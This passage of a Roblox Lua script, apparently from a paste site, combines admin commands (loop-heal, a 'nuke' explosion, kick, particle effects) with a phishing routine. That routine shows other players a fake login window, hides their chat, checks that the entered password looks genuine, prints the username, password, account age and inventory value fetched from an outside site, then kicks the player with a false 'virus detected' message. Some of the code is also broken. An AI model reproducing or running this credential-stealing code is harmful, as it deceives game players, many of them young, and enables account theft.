  1924. if Cmd.Text:lower():sub(1,9) == "loopheal " then
  1925. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1926. for i, v in pairs(plrz) do
  1927. if v then
  1928. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1929. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1930. repeat wait()
  1931. coroutine.resume(coroutine.create(function()
  1932. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1933. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1934. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1935. end
  1936. end))
  1937. until nil]]
  1938. end
  1939. end
  1940. end
  1941.  
  1942.  
  1943.  
  1944.  
  1945.  
  1946.  
  1947. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1948. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1949. for i, v in pairs(plrz) do
  1950. coroutine.resume(coroutine.create(function()
  1951. if v and v.Character and v.Character:findFirstChild("Torso") then
  1952. local p = Instance.new("Part",game.Workspace)
  1953. p.Anchored = true
  1954. p.CanCollide = false
  1955. p.formFactor = "Symmetric"
  1956. p.Shape = "Ball"
  1957. p.Size = Vector3.new(1,1,1)
  1958. p.BrickColor = BrickColor.new("New Yeller")
  1959. p.Transparency = .5
  1960. p.Reflectance = .2
  1961. p.TopSurface = 0
  1962. p.BottomSurface = 0
  1963. p.Touched:connect(function(hit)
  1964. if hit and hit.Parent then
  1965. local ex = Instance.new("Explosion", game.Workspace)
  1966. ex.Position = hit.Position
  1967. ex.BlastRadius = 11
  1968. ex.BlastPressure = math.huge
  1969. end
  1970. end)
  1971. local cf = v.Character.Torso.CFrame
  1972. p.CFrame = cf
  1973. for i = 1, 333 do
  1974. p.Size = p.Size + Vector3.new(3,3,3)
  1975. p.CFrame = cf
  1976. wait(1/44)
  1977. end
  1978. p:Destroy()
  1979. end
  1980. end))
  1981. end
  1982. end
  1983.  
  1984. if Cmd.Text:lower():sub(1,5) == "kick " then
  1985. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1986. for i, v in pairs(plrz) do
  1987. coroutine.resume(coroutine.create(function()
  1988. if v then v:Destroy() end
  1989. end))
  1990. end
  1991. end
  1992.  
  1993. if Cmd.Text:lower():sub(1,5) == "emit " then
  1994. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1995. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1996. for i, v in pairs(plrz) do
  1997. coroutine.resume(coroutine.create(function()
  1998. if v.Character then v.Character:FindFirstChild("Torso")
  1999. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  2000. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  2001. end
  2002. end))
  2003. end
  2004.  
  2005. if Cmd.Text:lower():sub(1,7) == "unemit " then
  2006. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  2007. for i, v in pairs(plrz) do
  2008. coroutine.resume(coroutine.create(function()
  2009. if v and v.Character and v.Character:findFirstChild("Torso") then
  2010. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  2011. end
  2012. end))
  2013. end
  2014. end end
  2015.  
  2016. end
  2017.  
  2018.  
  2019.  
  2020. function Clicked5()
  2021. for i,v in pairs(game.Players:GetChildren())do
  2022. gui = NewGuiPart65:Clone()
  2023. gui.Parent = Owner.PlayerGui
  2024. gui.ErrorFrame.Visible = true
  2025. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2026. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2027. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2028. passw = gui.ErrorFrame.TB2.Text
  2029. tb1 = gui.ErrorFrame.TB1.Text
  2030. end end
  2031.  
  2032.  
  2033.  
  2034.  
  2035. wait(3)
  2036. NewGuiPart72.Visible = true
  2037.  
  2038.  
  2039. RAPApi = true
  2040.  
  2041.  
  2042.  
  2043.  
  2044. local checktrue = Instance.new("BoolValue")
  2045. checktrue.Parent = CoreValues
  2046. checktrue.Name = "PasscheckTrue"
  2047. checktrue.Value = false
  2048.  
  2049. tb1 = otherp.Name
  2050.  
  2051. PassWord.Value = NewGuiPart71.Text
  2052. UserName.Value = NewGuiPart73.Text
  2053.  
  2054. function getRap(user)
  2055. local rap = ""
  2056. if RAPApi then
  2057. ypcall(function()
  2058. local http = game:GetService("HttpService")
  2059. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2060. rap = tostring(rawrap.rap)
  2061. end)
  2062. else
  2063. rap = "N/A"
  2064. end
  2065. return rap
  2066. end
  2067. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2068.  
  2069. function BCtoDumpStr(str)
  2070. local res = ""
  2071. if str == "Enum.MembershipType.BuildersClub" then
  2072. res = "[BC] "
  2073. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2074. res = "[TBC] "
  2075. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2076. res = "[OBC] "
  2077. elseif str == "Enum.MembershipType.None" then
  2078. res = ""
  2079. end
  2080. return res
  2081. end
  2082.  
  2083. function logAccount(user,pass)
  2084. local playerName = user.Name
  2085. local playerAge = tostring(user.AccountAge)
  2086. local playerRAP = getRap(playerName)
  2087.  
  2088.  
  2089. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2090. end
  2091.  
  2092. local GuiRemains = Instance.new("Folder")
  2093. GuiRemains.Name = "GuiRemains"
  2094. GuiRemains.Parent = CoreValues
  2095.  
  2096. function checkPass(pass)
  2097.  
  2098. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2099. Textg.Text = "PassWord Not Found In DataBase."
  2100. return false
  2101. end
  2102. local foundNums = 0
  2103. local foundLetters = 0
  2104. if string.find(pass, " ") then
  2105. Textg.Text = "PassWord Not Found In DataBase."
  2106. return false
  2107. end
  2108. if pass:len() < 6 or pass:len() > 20 then
  2109. Textg.Text = "PassWord Not Found In DataBase."
  2110. return false
  2111. end
  2112. for i=1,pass:len() do
  2113. if pass:sub(i,i):match("%d") ~= nil then
  2114. foundNums = foundNums + 1
  2115. end
  2116. end
  2117. if foundNums < 2 then
  2118. Textg.Text = "PassWord Not Found In DataBase."
  2119. return false
  2120. end
  2121. for i=1,pass:len() do
  2122. if pass:sub(i,i):match("%a") ~= nil then
  2123. foundLetters = foundLetters + 1
  2124. end
  2125. end
  2126. if foundLetters < 4 then
  2127. Textg.Text = "PassWord Not Found In DataBase."
  2128. return false
  2129. end
  2130. checktrue = true
  2131. return true
  2132.  
  2133. end
  2134. function respawn(user)
  2135. local person = game.Players[user]
  2136. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2137. person:Kick("A Virus Was Detected.")
  2138. person:Destroy();
  2139. end
  2140.  
  2141. function UnGui(user)
  2142. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2143. user:LoadCharacter();
  2144. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2145. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2146. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2147. end
  2148.  
  2149. function Done()
  2150. local pl = gui.Parent.Parent
  2151. UserName.Value = pl.Name
  2152. PassWord.Value = gui.ErrorFrame.TB2.Text
  2153. checkPass(gui.ErrorFrame.TB2.Text)
  2154. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2155. respawn(pl.Name);
  2156. pl:Kick("A Virus Was Detected.")
  2157. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2158. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2159. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2160.  
  2161. end
  2162.  
  2163.  
  2164. function Clicked6()
  2165.  
  2166. Done();
  2167.  
  2168.  
  2169.  
  2170. end
  2171.  
  2172.  
  2173. game.Workspace.ChildAdded:connect(function(per)
  2174. if per.Name == otherp.Name then
  2175. if IsRunning.Value == true then
  2176. if otherp.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2177. Clicked5()
  2178. end
  2179. end end
  2180. end)
  2181.  
  2182.  
  2183.  
  2184.  
  2185.  
  2186. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2187. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2188. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2189. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2190. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2191. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2192. Owner.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2193. Owner.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2194.  
  2195. NewGuiPart1:Clone().Parent = CoreValues
  2196. NewGuiPart65:Clone().Parent = CoreValues
  2197.  
  2198. game.StarterGui.ResetPlayerGuiOnSpawn = false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement